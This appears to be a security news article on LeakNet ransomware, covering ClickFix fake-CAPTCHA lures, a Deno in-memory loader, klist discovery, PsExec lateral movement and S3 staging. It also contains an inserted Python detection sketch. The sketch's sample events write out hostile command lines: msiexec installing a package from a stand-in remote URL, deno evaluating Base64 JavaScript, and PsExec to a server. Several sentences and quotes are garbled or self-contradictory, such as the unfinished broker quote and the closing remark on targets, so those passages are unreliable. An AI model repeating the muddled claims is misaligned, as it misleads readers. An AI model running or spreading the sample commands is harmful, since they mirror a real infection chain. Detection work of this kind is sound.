
LeakNet Ransomware Uses ClickFix for Hacked Sites, Uses Deno In-Memory Loader

A ransomware operation known as LeakNet has been observed using the ClickFix social engineering tactic, delivered through compromised websites, as a primary means of initial access.

The use of ClickFix, in which users are tricked into running malicious commands to fix non-existent errors, is a departure from traditional initial-access methods such as buying stolen credentials from initial access brokers (IABs), ReliaQuest said in a technical report published today.

The second key feature of the attack is a command-and-control (C2) stage loader built on the Deno JavaScript runtime, which executes the malicious payload directly in memory.

“The key takeaway here is that both entry methods lead to the same sequence of repeated exploits every time,” the cybersecurity company said. “That gives defenders something concrete to work with: known behavior that you can detect and disrupt at each stage, before the ransomware is sent, regardless of how LeakNet got in.”

LeakNet first appeared in November 2024, describing itself as a “digital watchdog” focused on internet freedom and transparency. According to data collected by Dragos, the group has also targeted industrial organizations.

Using ClickFix to breach victims offers several advantages, chief among them that it reduces dependence on third-party providers, lowers the cost of acquiring each victim, and removes the operational bottleneck of waiting for valuable accounts to come up for sale.

In these attacks, legitimate but compromised sites serve fake CAPTCHA checks that instruct users to copy and paste an “msiexec.exe” command into the Windows Run dialog. The attacks are not limited to a specific industry; instead they cast a wide net to infect as many victims as possible.

The development comes as many threat actors adopt the ClickFix playbook, which abuses trust and everyday workflows to lure users into executing malicious commands with legitimate Windows tools in a way that looks familiar and safe.

“LeakNet’s adoption of ClickFix marks both the first documented growth of the access group and a logical change,” said ReliaQuest.

“From the perspective of the IABs, LeakNet removes dependencies that inherently limited how quickly and widely it could work. And because ClickFix is delivered through legitimate—but vulnerable—websites that don’t present the same obvious signals at the network layer as attacker-run infrastructure.”

In addition to using ClickFix to launch the attack chain, LeakNet has been observed using a Deno-based loader to execute Base64-encoded JavaScript directly in memory, reducing on-disk evidence and evading detection. The payload is designed to fingerprint the compromised system, contact an external server to download next-stage malware, and enter a polling loop that repeatedly downloads and runs additional code with Deno.

Separately, ReliaQuest said it also observed an intrusion attempt in which malicious actors used a Microsoft Teams-based phishing attack to socially engineer a user into launching an infection chain that ends with the same Deno loader. While attribution remains unconfirmed, the use of the bring-your-own-runtime (BYOR) method may indicate an expansion of LeakNet’s initial access vectors, or that other threat actors have adopted the same technique.

LeakNet’s post-compromise operation follows a consistent path: it starts with a DLL sideloader launching a malicious DLL delivered by the loader, followed by lateral movement using PsExec, data exfiltration, and encryption.

“LeakNet uses cmd.exe /c klist, a built-in Windows command that displays active authentication credentials on a vulnerable system. This tells an attacker which accounts and services are already accessible without the need to request new credentials, so they can move quickly and deliberately,” ReliaQuest said.

“In staging and deployment, LeakNet uses S3 buckets, exploiting the appearance of common cloud traffic to reduce its availability.”
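As an added illustration (not code from the ReliaQuest report), the following Python detection sketch runs over a few constructed process-creation events and maps each to a stage of the chain described above: ClickFix via msiexec launched from the Run dialog, the Deno in-memory loader, klist discovery, and PsExec lateral movement. The event shape, file paths, hostnames and URL are assumptions.

```python
import re

# Constructed sample process-creation events (not from the report), flattened
# into a simplified EDR/Sysmon-like shape: parent image, image, command line.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /i https://captcha-fix.example.invalid/verify.msi /qn"},
    {"parent": r"C:\Windows\System32\msiexec.exe", "image": r"C:\Users\bob\AppData\Local\deno\deno.exe",
     "cmdline": "deno.exe eval -A eval(atob('Y29uc29sZS5sb2coMSk='))"},
    {"parent": r"C:\Windows\System32\rundll32.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c klist"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Tools\PsExec.exe",
     "cmdline": r"PsExec.exe \\FILESRV01 -s cmd.exe"},
    # Benign control: an administrator installing a package from a local path.
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Installers\vendor.msi /qn"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Map one process-creation event to a LeakNet chain stage, or None."""
    image, parent, cmd = basename(event["image"]), basename(event["parent"]), event["cmdline"]
    # ClickFix: a command pasted into the Run dialog is spawned by explorer.exe;
    # the fake-CAPTCHA variant hands msiexec a remote package URL.
    if image == "msiexec.exe" and parent == "explorer.exe" and URL_RE.search(cmd):
        return "initial_access", "clickfix_msiexec_remote_url"
    # Bring-your-own-runtime loader: deno evaluating inline or Base64 JavaScript.
    if image == "deno.exe" and ("eval" in cmd.lower() or "atob(" in cmd or B64_RE.search(cmd)):
        return "execution", "deno_inline_or_base64_eval"
    # Discovery: Kerberos ticket enumeration via cmd.exe /c klist.
    if image == "cmd.exe" and re.search(r"\bklist\b", cmd, re.IGNORECASE):
        return "discovery", "cmd_klist"
    # Lateral movement with PsExec.
    if image in ("psexec.exe", "psexec64.exe"):
        return "lateral_movement", "psexec"
    return None

def detect_chain(events):
    """Group hits by stage; several stages on one host is the chain the report describes."""
    hits = {}
    for ev in events:
        result = classify(ev)
        if result:
            stage, rule = result
            hits.setdefault(stage, []).append((rule, ev["cmdline"]))
    return hits

if __name__ == "__main__":
    for stage, matches in detect_chain(SAMPLE_EVENTS).items():
        print(stage, matches)
```

The benign local msiexec install produces no hit, while the four malicious events cover every stage; in practice each rule would be tuned against the environment's own baseline.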

The development comes as Google revealed that Qilin (aka Agenda), Akira (aka RedBike), Cl0p, Play, SafePay, INC Ransom, Lynx, RansomHub, DragonForce (aka FireFlame and FuryStorm), and Sinobi emerged as the top 10 ransomware brands by number of victims listed on their data leak sites.

“In the third-party incidents, the first access vector was confirmed or suspected of exploiting vulnerabilities, usually in common VPNs and firewalls,” said the Google Threat Intelligence Group (GTIG), adding that 77% of analyzed ransomware intrusions included suspected data theft, an increase from 57% in 2024.

“Despite the ongoing disturbances caused by conflicts and disruptions of players, ransomware actors remain motivated and the robbery ecosystem shows continued resilience. Several indicators suggest that the overall profitability of these activities is decreasing, and at least some threat actors are moving their target statistics away from large companies to focus on small-volume attacks instead of small organizations.”
